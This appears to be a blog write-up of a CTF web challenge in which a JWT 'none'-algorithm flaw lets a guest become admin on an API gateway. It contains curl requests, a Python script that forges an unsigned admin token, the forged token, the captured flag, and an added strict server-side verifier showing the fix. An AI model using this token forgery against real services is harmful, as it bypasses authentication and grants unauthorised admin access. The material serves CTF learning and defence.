SCSC2026 Final - API Gateway v2 - Web Writeup

Category: Web

Flag: SCSC26{t0k3n_b0d0ng_b1s4_j4d1_4dm1n_b3s4r}

Description: Our API Gateway uses JWT-based (stateless) sessions. You are currently connected with role: guest. The developer left a debug feature that allows the “none” algorithm for internal testing. Can you use it to become admin?

The service was an API gateway at http://sriwijayasecuritysociety.com:8007/. A first request showed that the server created a JWT session in the api_token cookie. The body was empty, but the cookie mattered.

curl -si http://sriwijayasecuritysociety.com:8007/
HTTP/1.1 200 OK
Set-Cookie: api_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbm9ueW1vdXMiLCJyb2xlIjoiZ3Vlc3QiLCJpYXQiOjE3Nzg5MTE5MjF9.33SOsKo5PU2sGHfmPRF_8fygX9PsmAvk0SyShqB92RY

Decoding the token showed a normal HS256 header and a guest payload. The user was anonymous, and the role was guest.

Header  : {"typ":"JWT","alg":"HS256"}
Payload : {"sub":"anonymous","role":"guest","iat":1778911921}

Sending the cookie back made the page render the gateway dashboard. The page named the protected endpoint as /v2/admin/dashboard, rejected the guest role, and printed a debug footer saying the token was verified via JWT HS256 (or compatible). That matched the challenge hint about a debug feature accepting the none algorithm.

"role": "guest",
"error": "Forbidden. Admin role required."

The solution was to forge a JWT with alg set to none, set role to admin, and leave the signature empty. This script builds the token used in the request.

import base64
import json

header = {"typ": "JWT", "alg": "none"}
payload = {"sub": "admin", "role": "admin", "iat": 1778911953}

def encode(value):
    raw = json.dumps(value, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

print(f"{encode(header)}.{encode(payload)}.")

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc3ODkxMTk1M30.

The forged token went into the same api_token cookie. The trailing dot is the empty JWT signature.

curl -si http://sriwijayasecuritysociety.com:8007/ -b "api_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc3ODkxMTk1M30."
"user": "admin",
"role": "admin",
"data": {
    "flag": "SCSC26{t0k3n_b0d0ng_b1s4_j4d1_4dm1n_b3s4r}",
    "secret_config": "enabled"
}
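
The server-side check that would have rejected the forged token, as an added example (not code from the challenge or from the original post). The key, the function names and the lenient model of the debug behaviour are assumptions; the gateway's real code and secret are not shown on the page.

```python
import base64
import hashlib
import hmac
import json

KEY = b"constructed-demo-key"  # assumption: stands in for the unknown gateway secret

def b64d(part):
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))
def b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def sign_hs256(claims, key=KEY):
    head, body = (b64e(json.dumps(v, separators=(",", ":")).encode())
                  for v in ({"typ": "JWT", "alg": "HS256"}, claims))
    sig = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64e(sig)}"

def verify_strict(token, key=KEY):
    # HS256 is pinned server-side; the header is checked against it, never obeyed.
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        raise ValueError("malformed token or empty signature")
    head, body, sig = parts
    if json.loads(b64d(head)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64d(sig)):
        raise ValueError("bad signature")
    return json.loads(b64d(body))

def verify_lenient(token, key=KEY):
    # Assumed model of the debug behaviour: the token's own header picks the check.
    head, body, _sig = token.split(".")
    if str(json.loads(b64d(head)).get("alg")).lower() == "none":
        return json.loads(b64d(body))  # no signature check at all
    return verify_strict(token, key)

def accepted_role(verify, token):
    try:
        return verify(token).get("role")
    except ValueError:
        return None

FORGED = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc3ODkxMTk1M30."  # token from the write-up
GUEST = sign_hs256({"sub": "anonymous", "role": "guest", "iat": 1778911921})  # constructed sample
if __name__ == "__main__":
    for name, tok in (("forged", FORGED), ("guest", GUEST)):
        print(name, accepted_role(verify_lenient, tok), accepted_role(verify_strict, tok))
```

The strict verifier never branches on the header's alg value, so the empty-signature token fails before any claim is read.
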
https://blog.rei.my.id/posts/157/scsc2026-final-api-gateway-v2-web-writeup/
Author: Reidho Satria
Published at: 2026-05-16
License: CC BY-NC-SA 4.0